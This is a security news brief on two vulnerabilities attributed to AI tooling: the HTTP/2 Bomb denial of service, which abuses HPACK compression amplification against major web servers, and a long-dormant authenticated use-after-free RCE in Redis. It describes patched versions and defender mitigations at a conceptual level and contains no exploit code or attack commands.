The Bugs AI Found This Week: an HTTP/2 'Bomb' and a Two-Year-Old Redis RCE
Two vulnerabilities disclosed this cycle were found by AI tooling: HTTP/2 Bomb (CVE-2026-49975), a remote DoS that crashes NGINX, Apache, IIS, Envoy and Cloudflare Pingora in default config, and CVE-2026-23479, a two-year-old authenticated RCE in Redis.
Key Takeaways
|
The 'AI finds the bugs' story has graduated from vendor demos to shipping CVEs in the infrastructure you actually run — a default-config denial-of-service across the five biggest web servers, and a two-year-old remote-code-execution flaw in one of the most deployed data stores.
SAN FRANCISCO, CALIFORNIA — Two vulnerabilities disclosed this cycle were discovered by AI tooling rather than human researchers, extending a trend The CyberSignal has tracked through its Project Glasswing and Mythos coverage. The first, dubbed HTTP/2 Bomb and tracked as CVE-2026-49975, is a remote denial-of-service that — per The Hacker News, BleepingComputer and the security firm Calif, which codenamed it — can crash major web servers including NGINX, Apache HTTPD, Microsoft IIS, Envoy and Cloudflare Pingora in their default HTTP/2 configurations, and was reportedly surfaced by OpenAI Codex. The second, CVE-2026-23479, is a use-after-free in Redis's blocking-client code that lets an authenticated user execute operating-system commands on the host; it was introduced in Redis 7.2.0, remained undetected for more than two years, and was found by an autonomous AI bug-hunting tool.
Taken together, the two disclosures make a single point that is operational rather than theoretical: the discovery side of AI is now generating genuine CVEs in commodity infrastructure, and the rate at which those flaws surface is beginning to outpace the cadence at which organizations patch.
| Two AI-Discovered Flaws at a Glance | |
|---|---|
| Field | Details |
| HTTP/2 Bomb | CVE-2026-49975 — remote denial-of-service via HTTP/2 header-compression amplification |
| Affected Servers | NGINX, Apache HTTPD, Microsoft IIS, Envoy, Cloudflare Pingora — in default HTTP/2 configuration |
| Reported Impact | A single 100 Mbps machine drove Apache HTTPD and Envoy to allocate up to ~32 GB of memory in under 20 seconds |
| HTTP/2 Bomb Fixes | NGINX 1.29.8+ (new max_headers directive, default 1000); Apache mod_http2 v2.0.41; IIS, Envoy and Cloudflare Pingora unpatched at time of reporting |
| Discovery | HTTP/2 Bomb reportedly found by OpenAI Codex; Redis flaw found by an autonomous AI bug-hunting tool |
| Redis Flaw | CVE-2026-23479 — use-after-free in the unblock-client flow enabling authenticated OS command execution |
| Redis Versions | Introduced in 7.2.0; present through 8.6.2; fixed in 8.6.3 (released in the May 5, 2026 advisory) |
| Redis Severity | NVD CVSS v3.1 8.8; Redis CVSS v4.0 7.7 |
What Happened
HTTP/2 Bomb targets HPACK, the header-compression scheme built into HTTP/2. According to the technical write-up from Calif and reporting by The Hacker News and BleepingComputer, the attack chains two known techniques: a compression bomb and a Slowloris-style hold. On the compression side, a single byte on the wire expands into a full header allocation on the server, repeated thousands of times within one request; on the hold side, a zero-byte flow-control window prevents the server from ever freeing that memory. The combined effect is dramatic — a single machine on a 100 Mbps connection was reported to push Apache HTTPD and Envoy to allocate as much as 32 GB of memory in under 20 seconds, rendering them unresponsive. The flaw is reachable in each server's default HTTP/2 configuration, and a Shodan analysis cited in reporting put more than 880,000 public-facing sites running an affected server with HTTP/2 enabled. OpenAI Codex reportedly found the issue by chaining the two behaviors together.
CVE-2026-23479 is a different shape of problem. Redis patched a use-after-free in its blocking-client code — specifically, the unblock-client flow fails to handle an error return when re-executing a blocked command, and when a blocked client is evicted during that flow an authenticated attacker can trigger a use-after-free that can lead to remote code execution. The flaw was introduced in Redis 7.2.0 and remained in every stable branch until the May 5, 2026 fixes, meaning it sat unnoticed for more than two years before an autonomous AI security tool built to hunt bugs in large codebases surfaced it. NVD rates it 8.8 under CVSS v3.1, while Redis lists it as 7.7 under CVSS v4.0. Exploitation requires an authenticated session and the ability to issue blocking commands, and the fix is in Redis 8.6.3. The Redis advisory bundled CVE-2026-23479 with several other issues addressed in the same release.
The HTTP/2 Bomb Mechanism: One Byte In, Gigabytes Held
What makes HTTP/2 Bomb notable is the leverage. Header compression is a feature, not a bug — HPACK exists so that repetitive headers do not have to be re-sent in full on every request. The attack abuses that efficiency in reverse: because a compact reference on the wire expands into a full allocation in memory, an attacker can request enormous server-side memory commitments using very little bandwidth. Pairing that amplification with a flow-control hold that stops the server from reclaiming the memory turns a compression optimization into a resource-exhaustion primitive. The result is a remote DoS that works from a single host against servers in their out-of-the-box configuration. NGINX has shipped a fix in 1.29.8 and later that adds a max_headers directive defaulting to 1000, and Apache addressed it in mod_http2 v2.0.41; at the time of reporting, Microsoft IIS, Envoy and Cloudflare Pingora had no patch available.
The Redis Flaw: A Two-Year Dwell Time in a Core Data Store
CVE-2026-23479 illustrates a different risk: not that AI finds new bugs, but that it finds old ones. The use-after-free lived in Redis from version 7.2.0 onward and survived more than two years of releases, code review and human scrutiny before an autonomous AI tool flagged it. That dwell time is the point. Redis is one of the most widely deployed in-memory data stores in the world, sitting behind caches, session stores, queues and rate limiters across the internet. A long-dormant authenticated RCE in that codebase is exactly the kind of latent flaw The CyberSignal has argued AI discovery will increasingly surface — a theme running through Anthropic's Project Glasswing milestone, in which its Mythos system surfaced more than 10,000 vulnerabilities in a month, and the program's expansion to roughly 150 critical-infrastructure organizations.
From Vendor Demos to Shipping CVEs
For most of the past year, AI-driven vulnerability discovery has been a story about capability — benchmarks, lab results, and vendor announcements. This cycle marks the shift from demonstration to deployment: two real CVEs, in software that a large share of the internet runs, both attributed to AI tooling. It follows Google's confirmation of the first AI-built zero-day used in the wild, and arrives alongside the scaled-back AI executive order built around sharing AI-found vulnerabilities with critical infrastructure. The discovery engine is now producing output at a pace that the patching side of the ecosystem was not built to absorb, which reframes the defender problem: the constraint is no longer finding the flaws, it is shipping and applying the fixes fast enough.
Scope and Impact
The scope of HTTP/2 Bomb is set by how ubiquitous the affected software is. NGINX, Apache HTTPD, Microsoft IIS, Envoy and Cloudflare Pingora collectively terminate a very large fraction of the web's HTTP/2 traffic — as reverse proxies, web servers, ingress controllers and CDN edge nodes. Because the flaw is reachable in default configurations and a Shodan scan cited in reporting counted more than 880,000 public-facing sites running an affected server with HTTP/2 on, the exposed surface is broad and largely passive: operators do not have to have done anything wrong to be vulnerable. The fact that several of the affected products had no patch at the time of reporting widens the window in which interim hardening, rather than a fixed build, is the only available control.
The Redis flaw has a narrower but still significant footprint. Exploitation requires an authenticated session and the ability to issue blocking commands, so it is not an unauthenticated internet-wide free-for-all. But Redis instances are frequently deployed with weak authentication or exposed beyond their intended network boundary, and any such instance shortens the path from foothold to OS command execution on the host. The two-year presence of the flaw across the 7.2.0-through-8.6.2 range means a large installed base has been carrying it, and upgrade lag in data-store infrastructure tends to be measured in quarters, not days.
Some specifics should be confirmed against the primary advisories before treating them as settled: whether all five named web servers will ultimately ship dedicated fixes and on what timeline (IIS, Envoy and Cloudflare Pingora were unpatched at reporting), the precise list of mitigating versions and configuration directives per server, and the full set of Redis versions and companion CVEs addressed in the May 5 release. The 32 GB-in-20-seconds figure for HTTP/2 Bomb is a reported lab result against specific servers and conditions; real-world impact will vary with deployment, resource limits and existing rate controls.
Response and Attribution
For platform, SRE and web-infrastructure teams, the HTTP/2 Bomb response is a discovery-and-hardening exercise. Identify every HTTP/2-terminating surface — load balancers, reverse proxies, ingress controllers and CDN edge — and track vendor advisories for the mitigating release or configuration. Where a fixed build exists, deploy it: NGINX 1.29.8+ with the max_headers directive, and Apache mod_http2 v2.0.41. Where a fix is not yet available, apply interim hardening at the edge: rate-limiting and HTTP/2 frame and stream limits that cap how much a single connection can commit. Because the attack is single-source and sub-minute, rehearse the DoS playbook with an emphasis on failover and automatic restart behavior — detection alone will not save an unprotected node that exhausts memory in 20 seconds.
For teams running Redis, upgrade to the patched 8.6.3 release. Where an immediate upgrade is not possible, tighten authentication and network exposure so that only trusted clients can reach the instance, and audit for any Redis instances reachable beyond their intended network boundary. Authenticated RCE still requires a foothold, but an exposed or weakly authenticated cache is precisely the condition that turns this flaw from a contained risk into a host-takeover path. Treat Redis instances as the sensitive infrastructure they are rather than as disposable caches, and bring them into the same patch and exposure-review cadence as the rest of the estate.
Neither flaw has been tied to in-the-wild exploitation in the reporting reviewed for this brief, and neither has an associated threat actor — these are discovery-and-disclosure stories, not active-campaign stories. The attribution that matters here is the discovery attribution: OpenAI Codex for HTTP/2 Bomb and an autonomous AI bug-hunting tool for the Redis flaw. The CyberSignal notes that the 'reportedly discovered by' framing reflects vendor and researcher accounts; the operational reality for defenders does not depend on who found the bug, only on how quickly the fix gets deployed.
The CyberSignal Analysis
Signal 01 — Discovery Has Outrun Remediation
The throughline of both disclosures is a timing inversion. For years the hard part of vulnerability management was finding the flaws; the assumption baked into most patch programs was that disclosures would arrive at a human pace. AI-driven discovery breaks that assumption by surfacing flaws — including long-dormant ones — faster than organizations can ship and apply fixes. The defender implication is to stop optimizing for detection and start optimizing for remediation velocity: shorter patch SLAs, automated rollout, and tested failover for the cases where a fix is not yet available. The bottleneck has moved, and programs built around the old bottleneck will fall behind.
Signal 02 — Default Configurations Are Now a Liability Surface
HTTP/2 Bomb is dangerous precisely because it works against software in its out-of-the-box state. That inverts a common mental model in which only misconfigured or exotic setups are at risk. When a flaw is reachable in the default configuration of the five most common web servers, the exposed population is enormous and entirely passive. The lesson is to treat default-config behavior as an active part of the threat model — to apply protective limits (header counts, frame and stream caps, memory ceilings) proactively rather than assuming the defaults are safe — especially for the affected products that had no vendor patch at disclosure.
Signal 03 — Old Code Is the New Attack Surface
The Redis flaw's two-year dwell time is the more unsettling of the two findings. It says that the latent risk in widely deployed dependencies is larger than anyone has measured, and that AI tooling will now convert that latent risk into disclosed CVEs on a compressed schedule. Every organization should assume its dependency surface contains long-buried flaws that AI will surface before long. The defensive response is unglamorous: maintain an accurate software bill of materials, keep core data-store and web-server software current, and treat 'it has been stable for years' as a statement about luck rather than safety.
